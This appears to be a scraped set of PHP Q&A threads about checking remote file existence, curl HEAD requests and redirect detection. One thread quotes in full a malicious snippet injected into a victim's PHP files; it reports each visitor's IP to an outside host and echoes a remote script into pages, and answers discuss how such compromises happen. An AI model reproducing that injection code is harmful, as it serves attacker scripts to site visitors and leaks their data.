Is there a better way to check whether a file exists (it is on different domain so file_exists won't work) than this?
$fp = fsockopen($fileUri, 80, $errno, $errstr, 30);
if (!$fp) {
// file exists
}
fclose($fp);
I do like this. It work always fine:
$url = "http://www.example.com/index.php";
$header_response = get_headers($url, 1);
if ( strpos( $header_response[0], "404" ) !== false )
{
// FILE DOES NOT EXIST
}
else
{
// FILE EXISTS!!
}
see this example and the explanations
$url = "http://www.example.com/index.php";
$header_response = get_headers($url, 1);
if ( strpos( $header_response[0], "404" ) !== false )
{
// FILE DOES NOT EXIST
}
else
{
// FILE EXISTS!!
}
or
file_get_contents("http://example.com/path/to/image.gif",0,null,0,1);
set maxlength to 1
You could use curl and check the headers for a response code.
This question has a few examples you could use.
When using curl, use curl_setopt to switch CURLOPT_NOBODY to true so that it only downloads the headers and not the full file. E.g. curl_setopt($ch, CURLOPT_NOBODY, true);
From http://www.php.net/manual/en/function.fopen.php#98128
function http_file_exists($url)
{
$f=#fopen($url,"r");
if($f)
{
fclose($f);
return true;
}
return false;
}
All my tests show that it works as expected.
I would use curl to check the headers for this and validate the content type.
Something like:
function ExternalFileExists($location,$misc_content_type = false)
{
$curl = curl_init($location);
curl_setopt($curl,CURLOPT_NOBODY,true);
curl_setopt($curl,CURLOPT_HEADER,true);
curl_exec($curl);
$info = curl_getinfo($curl);
if((int)$info['http_code'] >= 200 && (int)$info['http_code'] <= 206)
{
//Response says ok.
if($misc_content_type !== false)
{
return strpos($info['content_type'],$misc_content_type);
}
return true;
}
return false;
}
And then you can use like so:
if(ExternalFileExists('http://server.com/file.avi','video'))
{
}
or if your unsure about the extension then like so:
if(ExternalFileExists('http://server.com/file.ext'))
{
}
what about
<?php
$a = file_get_contents('http://mydomain.com/test.html');
if ($a) echo('exists'); else echo('not exists');
Related
Last week we had a problem on our server where code was injected into PHP files. I was wondering what the cause of this could have been. The code snippet that has been injected into our files looked something like this.
#be7339#
if (empty($qjqb))
{
error_reporting(0);
#ini_set('display_errors', 0);
if (!function_exists('__url_get_contents'))
{
function __url_get_contents($remote_url, $timeout)
{
if(function_exists('curl_exec'))
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $remote_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); //timeout in seconds
$_url_get_contents_data = curl_exec($ch);
curl_close($ch);
}
elseif (function_exists('file_get_contents') && ini_get('allow_url_fopen'))
{
$ctx = #stream_context_create(array('http' =>array('timeout' => $timeout,)));
$_url_get_contents_data = #file_get_contents($remote_url, false, $ctx);
} elseif (function_exists('fopen') && function_exists('stream_get_contents')) {
$handle = #fopen($remote_url, "r");
$_url_get_contents_data = #stream_get_contents($handle);
} else {
$_url_get_contents_data = __file_get_url_contents($remote_url);
}
return $_url_get_contents_data;
}
}
if (!function_exists('__file_get_url_contents'))
{
function __file_get_url_contents($remote_url)
{
if (preg_match('/^([a-z]+):\/\/([a-z0-9-.]+)(\/.*$)/i', $remote_url, $matches))
{
$protocol = strtolower($matches[1]);
$host = $matches[2];
$path = $matches[3];
} else {
// Bad remote_url-format
return FALSE;
}
if ($protocol == "http")
{
$socket = #fsockopen($host, 80, $errno, $errstr, $timeout);
} else
{
// Bad protocol
return FALSE;
}
if (!$socket)
{
// Error creating socket
return FALSE;
}
$request = "GET $path HTTP/1.0\r\nHost: $host\r\n\r\n";
$len_written = #fwrite($socket, $request);
if ($len_written === FALSE || $len_written != strlen($request))
{
// Error sending request
return FALSE;
}
$response = "";
while (!#feof($socket) &&
($buf = #fread($socket, 4096)) !== FALSE) {
$response .= $buf;
}
if ($buf === FALSE) {
// Error reading response
return FALSE;
}
$end_of_header = strpos($response, "\r\n\r\n");
return substr($response, $end_of_header + 4);
}
}
if (empty($__var_to_echo) && empty($remote_domain))
{
$_ip = $_SERVER['REMOTE_ADDR'];
$qjqb = "http://pleasedestroythis.net/L3xmqGtN.php";
$qjqb = __url_get_contents($qjqb."?a=$_ip", 1);
if (strpos($qjqb, 'http://') === 0)
{
$__var_to_echo = '<script type="text/javascript" src="' . $qjqb . '?id=13028308"></script>';
echo $__var_to_echo;
}
}
}
I would like to ask how this could have happened. And how to prevent this in the future.
Thanks in advance.
Script (PHP) code injection usually means that someone has gotten hold of the password(s) to your hosting account. At the very minimum scan your PCs for spyware and viruses, and then change your passwords. Use SSL when connecting to your hosting account control panel, if possible. Be careful about using FTP, as it sends passwords in the clear. See if your host supports a more secure file transfer method.
The most common way this happens is you probably have a script that allows files uploads. Then if the script is not validating what file is uploaded a malicious user could upload a php file.
If your upload folder allows parsing of PHP files the user could run that PHP file in the browser, it could be some sort of file explorer which will then show the user all the files on your server. Now if any files have the right permissions the user could easily edit the file to include the extra code you are seeing.
Usually it's because somebody else got access to your FTP or you allow uploading PHP files.
You should look into other files, because there could be another code, that keeps adding those lines to your code (just guess because of "#be7339#" at the beginning.
What is the Apache version on your server ? This problem can come from using an outdated version..
Look at this link about security breaches on old versions Apache:
http://httpd.apache.org/security/vulnerabilities_20.html
Is there an alternative to file_get_contents? This is the code I'm having issues with:
if ( !$img = file_get_contents($imgurl) ) { $error[] = "Couldn't find the file named $card.$format at $defaultauto"; }
else {
if ( !file_put_contents($filename,$img) ) { $error[] = "Failed to upload $filename"; }
else { $success[] = "All missing cards have been uploaded"; }
}
I tried using cURL but couldn't quite figure out how to accomplish what this is accomplishing. Any help is appreciated!
There are many alternatives to file_get_contents I've posted a couple of alternatives below.
fopen
function fOpenRequest($url) {
$file = fopen($url, 'r');
$data = stream_get_contents($file);
fclose($file);
return $data;
}
$fopen = fOpenRequest('https://www.example.com');// This returns the data using fopen.
curl
function curlRequest($url) {
$c = curl_init();
curl_setopt($c, CURLOPT_URL, $url);
curl_setopt($c, CURLOPT_RETURNTRANSFER, true);
$data = curl_exec($c);
curl_close($c);
return $data;
}
$curl = curlRequest('https://www.example.com');// This returns the data using curl.
You could use one of these available options with the data stored in a variable to preform what you need to.
I am writing a PHP program that downloads a pdf from a backend and save to a local drive. Now how do I check whether the file exists before downloading?
Currently I am using curl (see code below) to check and download but it still downloads the file which is 1KB in size.
$url = "http://wedsite/test.pdf";
$path = "C:\\test.pdf;"
downloadAndSave($url,$path);
function downloadAndSave($urlS,$pathS)
{
$fp = fopen($pathS, 'w');
$ch = curl_init($urlS);
curl_setopt($ch, CURLOPT_FILE, $fp);
$data = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
echo $httpCode;
//If 404 is returned, then file is not found.
if(strcmp($httpCode,"404") == 1)
{
echo $httpCode;
echo $urlS;
}
fclose($fp);
}
I want to check whether the file exists before even downloading. Any idea how to do it?
You can do this with a separate curl HEAD request:
curl_setopt($ch, CURLOPT_NOBODY, true);
$data = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
When you actually want to download you can use set NOBODY to false.
Call this before your download function and it's done:
<?php function remoteFileExists($url) {
$curl = curl_init($url);
//don't fetch the actual page, you only want to check the connection is ok
curl_setopt($curl, CURLOPT_NOBODY, true);
//do request
$result = curl_exec($curl);
$ret = false;
//if request did not fail
if ($result !== false) {
//if request was ok, check response code
$statusCode = curl_getinfo($curl, CURLINFO_HTTP_CODE);
if ($statusCode == 200) {
$ret = true;
}
}
curl_close($curl);
return $ret;
}
?>
Since you are using HTTP to fetch a resource on the internet, what you really want to check is that the return code is a 404.
On some PHP installations, you can just use file_exists($url) out of the box. This does not work in all environments, however. http://www.php.net/manual/en/wrappers.http.php
Here is a function much like file_exists but for URLs, using curl:
<?php function curl_exists()
$file_headers = #get_headers($url);
if($file_headers[0] == 'HTTP/1.1 404 Not Found') {
$exists = false;
}
else {
$exists = true;
}
} ?>
source: http://www.php.net/manual/en/function.file-exists.php#75064
Sometimes the CURL extension isn't installed with PHP. In that case you can still use the socket library in the PHP core:
<?php function url_exists($url) {
$a_url = parse_url($url);
if (!isset($a_url['port'])) $a_url['port'] = 80;
$errno = 0;
$errstr = '';
$timeout = 30;
if(isset($a_url['host']) && $a_url['host']!=gethostbyname($a_url['host'])){
$fid = fsockopen($a_url['host'], $a_url['port'], $errno, $errstr, $timeout);
if (!$fid) return false;
$page = isset($a_url['path']) ?$a_url['path']:'';
$page .= isset($a_url['query'])?'?'.$a_url['query']:'';
fputs($fid, 'HEAD '.$page.' HTTP/1.0'."\r\n".'Host: '.$a_url['host']."\r\n\r\n");
$head = fread($fid, 4096);
$head = substr($head,0,strpos($head, 'Connection: close'));
fclose($fid);
if (preg_match('#^HTTP/.*\s+[200|302]+\s#i', $head)) {
$pos = strpos($head, 'Content-Type');
return $pos !== false;
}
} else {
return false;
}
} ?>
source: http://www.php.net/manual/en/function.file-exists.php#73175
An even faster function can be found here:
http://www.php.net/manual/en/function.file-exists.php#76246
In the first example above $file_headers[0] may contain more than or something other than 'HTTP/1.1 404 Not Found', e.g:
HTTP/1.1 404 Document+%2Fdb%2Fscotbiz%2Freports%2FR20131212%2Exml+not+found
So it's important to use some other test, e.g., regex, as '==' is not reliable.
I'm working on a little webcrawler as a side project at the moment and basically having it collect all hrefs on a page and then subsequently parsing those, my problem is.
How can I only get the actual page results? at the moment i'm using the following
foreach($page->getElementsByTagName('a') as $link)
{
$compare_url = parse_url($link->getAttribute('href'));
if (#$compare_url['host'] == "")
{
$links[] = 'http://'.#$base_url['host'].'/'.$link->getAttribute('href');
}
elseif ( #$base_url['host'] == #$compare_url['host'] )
{
$links[] = $link->getAttribute('href');
}
}
As you can see this will bring in jpegs, exe files etc. I only need to pickup the web pages like .php, .html, .asp etc.
I'm not sure if there is some function able to work this one out or if it will need to be regex from some sort of master list?
Thanks
Since the URL string alone doesn't connected with the resource behind it in any way you will have to go out and ask the webserver about them. For this there's a HTTP method called HEAD so you won't have to download everything.
You can implement this with curl in php like this:
function is_html($url) {
function curl_head($url) {
$curl = curl_init($url);
curl_setopt($curl, CURLOPT_NOBODY, true);
curl_setopt($curl, CURLOPT_HEADER, true);
curl_setopt($curl, CURLOPT_MAXREDIRS, 5);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true );
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_HTTP_VERSION , CURL_HTTP_VERSION_1_1);
$content = curl_exec($curl);
curl_close($curl);
// redirected heads just pile up one after another
$parts = explode("\r\n\r\n", trim($content));
// return only the last one
return end($parts);
}
$header = curl_head('http://github.com');
// look for the content-type part of the header response
return preg_match('/content-type\s*:\s*text\/html/i', $header);
}
var_dump(is_html('http://github.com'));
This version is only accepts text/html responses and doesn't check if the response is 404 or other error (however follows redirects up to 5 jumps). You can tweak the regexp or add some error handling in either from the curl response, or by matching against the header string's first line.
Note: Webservers will run scripts behind these URLs to give you responses. Be careful not overload hosts with probing, or grabbing "delete" or "unsubscribe" type links.
To check if a page is valid (html,php... extension use this function:
function check($url){
$extensions=array("php","html"); //Add extensions here
foreach($extensions as $ext){
if(substr($url,-(strlen($ext)+1))==".".$ext){
return 1;
}
}
return 0;
}
foreach($page->getElementsByTagName('a') as $link) {
$compare_url = parse_url($link->getAttribute('href'));
if (#$compare_url['host'] == "") { if(check($link->getAttribute('href'))){ $links[] = 'http://'.#$base_url['host'].'/'.$link->getAttribute('href');} }
elseif ( #$base_url['host'] == #$compare_url['host'] ) {
if(check($link->getAttribute('href'))){ $links[] = $link->getAttribute('href'); }
}
Consider using preg_match to check the type of the link (application , picture , html file) and considering the results decide what to do.
Another option (and simple) is to use explode and find the last string of the url which comes after a . (the extension)
For instance:
//If the URL will has any one of the following extensions , ignore them.
$forbid_ext = array('jpg','gif','exe');
foreach($page->getElementsByTagName('a') as $link) {
$compare_url = parse_url($link->getAttribute('href'));
if (#$compare_url['host'] == "")
{
if(check_link_type($link->getAttribute('href')))
$links[] = 'http://'.#$base_url['host'].'/'.$link->getAttribute('href');
}
elseif ( #$base_url['host'] == #$compare_url['host'] )
{
if(check_link_type($link->getAttribute('href')))
$links[] = $link->getAttribute('href');
}
}
function check_link_type($url)
{
global $forbid_ext;
$ext = end(explode("." , $url));
if(in_array($ext , $forbid_ext))
return false;
return true;
}
UPDATE (instead of checking 'forbidden' extensions , let's look for good ones)
$good_ext = array('html','php','asp');
function check_link_type($url)
{
global $good_ext;
$ext = end(explode("." , $url));
if($ext == "" || !in_array($ext , $good_ext))
return true;
return false;
}
I have implemented a function that runs on each page that I want to restrict from non-logged in users. The function automatically redirects the visitor to the login page in the case of he or she is not logged in.
I would like to make a PHP function that is run from a exernal server and iterates through a number of set URLs (array with URLs that is for each protected site) to see if they are redirected or not. Thereby I could easily make sure if protection is up and running on every page.
How could this be done?
Thanks.
$urls = array(
'http://www.apple.com/imac',
'http://www.google.com/'
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
foreach($urls as $url) {
curl_setopt($ch, CURLOPT_URL, $url);
$out = curl_exec($ch);
// line endings is the wonkiest piece of this whole thing
$out = str_replace("\r", "", $out);
// only look at the headers
$headers_end = strpos($out, "\n\n");
if( $headers_end !== false ) {
$out = substr($out, 0, $headers_end);
}
$headers = explode("\n", $out);
foreach($headers as $header) {
if( substr($header, 0, 10) == "Location: " ) {
$target = substr($header, 10);
echo "[$url] redirects to [$target]<br>";
continue 2;
}
}
echo "[$url] does not redirect<br>";
}
I use curl and only take headers, after I compare my url and url from header curl:
$url="http://google.com";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_TIMEOUT, '60'); // in seconds
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_NOBODY, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$res = curl_exec($ch);
if(curl_getinfo($ch)['url'] == $url){
echo "not redirect";
}else {
echo "redirect";
}
You could always try adding:
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
since 302 means it moved, allow the curl call to follow it and return whatever the moved url returns.
Getting the headers with get_headers() and checking if Location is set is much simpler.
$urls = [
"https://example-1.com",
"https://example-2.com"
];
foreach ($urls as $key => $url) {
$is_redirect = does_url_redirect($url) ? 'yes' : 'no';
echo $url . ' is redirected: ' . $is_redirect . PHP_EOL;
}
function does_url_redirect($url){
$headers = get_headers($url, 1);
if (!empty($headers['Location'])) {
return true;
} else {
return false;
}
}
I'm not sure whether this really makes sense as a security check.
If you are worried about files getting called directly without your "is the user logged in?" checks being run, you could do what many big PHP projects do: In the central include file (where the security check is being done) define a constant BOOTSTRAP_LOADED or whatever, and in every file, check for whether that constant is set.
Testing is great and security testing is even better, but I'm not sure what kind of flaw you are looking to uncover with this? To me, this idea feels like a waste of time that will not bring any real additional security.
Just make sure your script die() s after the header("Location:...") redirect. That is essential to stop additional content from being displayed after the header command (a missing die() wouldn't be caught by your idea by the way, as the redirect header would still be issued...)
If you really want to do this, you could also use a tool like wget and feed it a list of URLs. Have it fetch the results into a directory, and check (e.g. by looking at the file sizes that should be identical) whether every page contains the login dialog. Just to add another option...
Do you want to check the HTTP code to see if it's a redirect?
$params = array('http' => array(
'method' => 'HEAD',
'ignore_errors' => true
));
$context = stream_context_create($params);
foreach(array('http://google.com', 'http://stackoverflow.com') as $url) {
$fp = fopen($url, 'rb', false, $context);
$result = stream_get_contents($fp);
if ($result === false) {
throw new Exception("Could not read data from {$url}");
} else if (! strstr($http_response_header[0], '301')) {
// Do something here
}
}
I hope it will help you:
function checkRedirect($url)
{
$headers = get_headers($url);
if ($headers) {
if (isset($headers[0])) {
if ($headers[0] == 'HTTP/1.1 302 Found') {
//this is the URL where it's redirecting
return str_replace("Location: ", "", $headers[9]);
}
}
}
return false;
}
$isRedirect = checkRedirect($url);
if(!$isRedirect )
{
echo "URL Not Redirected";
}else{
echo "URL Redirected to: ".$isRedirect;
}
You can use session,if the session array is not set ,the url redirected to a login page.
.
I modified Adam Backstrom answer and implemented chiborg suggestion. (Download only HEAD). It have one thing more: It will check if redirection is in a page of the same server or is out. Example: terra.com.br redirects to terra.com.br/portal. PHP will considerate it like redirect, and it is correct. But i only wanted to list that url that redirect to another URL. My English is not good, so, if someone found something really difficult to understand and can edit this, you're welcome.
function RedirectURL() {
$urls = array('http://www.terra.com.br/','http://www.areiaebrita.com.br/');
foreach ($urls as $url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// chiborg suggestion
curl_setopt($ch, CURLOPT_NOBODY, true);
// ================================
// READ URL
// ================================
curl_setopt($ch, CURLOPT_URL, $url);
$out = curl_exec($ch);
// line endings is the wonkiest piece of this whole thing
$out = str_replace("\r", "", $out);
echo $out;
$headers = explode("\n", $out);
foreach($headers as $header) {
if(substr(strtolower($header), 0, 9) == "location:") {
// read URL to check if redirect to somepage on the server or another one.
// terra.com.br redirect to terra.com.br/portal. it is valid.
// but areiaebrita.com.br redirect to bwnet.com.br, and this is invalid.
// what we want is to check if the address continues being terra.com.br or changes. if changes, prints on page.
// if contains http, we will check if changes url or not.
// some servers, to redirect to a folder available on it, redirect only citting the folder. Example: net11.com.br redirect only to /heiden
// only execute if have http on location
if ( strpos(strtolower($header), "http") !== false) {
$address = explode("/", $header);
print_r($address);
// $address['0'] = http
// $address['1'] =
// $address['2'] = www.terra.com.br
// $address['3'] = portal
echo "url (address from array) = " . $url . "<br>";
echo "address[2] = " . $address['2'] . "<br><br>";
// url: terra.com.br
// address['2'] = www.terra.com.br
// check if string terra.com.br is still available in www.terra.com.br. It indicates that server did not redirect to some page away from here.
if(strpos(strtolower($address['2']), strtolower($url)) !== false) {
echo "URL NOT REDIRECT";
} else {
// not the same. (areiaebrita)
echo "SORRY, URL REDIRECT WAS FOUND: " . $url;
}
}
}
}
}
}
function unshorten_url($url){
$ch = curl_init();
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_URL, $url);
$out = curl_exec($ch);
$real_url = $url;//default.. (if no redirect)
if (preg_match("/location: (.*)/i", $out, $redirect))
$real_url = $redirect[1];
if (strstr($real_url, "bit.ly"))//the redirect is another shortened url
$real_url = unshorten_url($real_url);
return $real_url;
}
I have just made a function that checks if a URL exists or not
$ch = curl_init();
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
function url_exists($url, $ch) {
curl_setopt($ch, CURLOPT_URL, $url);
$out = curl_exec($ch);
// line endings is the wonkiest piece of this whole thing
$out = str_replace("\r", "", $out);
// only look at the headers
$headers_end = strpos($out, "\n\n");
if( $headers_end !== false ) {
$out = substr($out, 0, $headers_end);
}
//echo $out."====<br>";
$headers = explode("\n", $out);
//echo "<pre>";
//print_r($headers);
foreach($headers as $header) {
//echo $header."---<br>";
if( strpos($header, 'HTTP/1.1 200 OK') !== false ) {
return true;
break;
}
}
}
Now I have used an array of URLs to check if a URL exists as following:
$my_url_array = array('http://howtocode.pk/result', 'http://google.com/jobssss', 'https://howtocode.pk/javascript-tutorial/', 'https://www.google.com/');
for($j = 0; $j < count($my_url_array); $j++){
if(url_exists($my_url_array[$j], $ch)){
echo 'This URL "'.$my_url_array[$j].'" exists. <br>';
}
}
I can't understand your question.
You have an array with URLs and you want to know if user is from one of the listed URLs?
If I'm right in understanding your quest:
$urls = array('http://url1.com','http://url2.ru','http://url3.org');
if(in_array($_SERVER['HTTP_REFERER'],$urls))
{
echo 'FROM ARRAY';
} else {
echo 'NOT FROM ARR';
}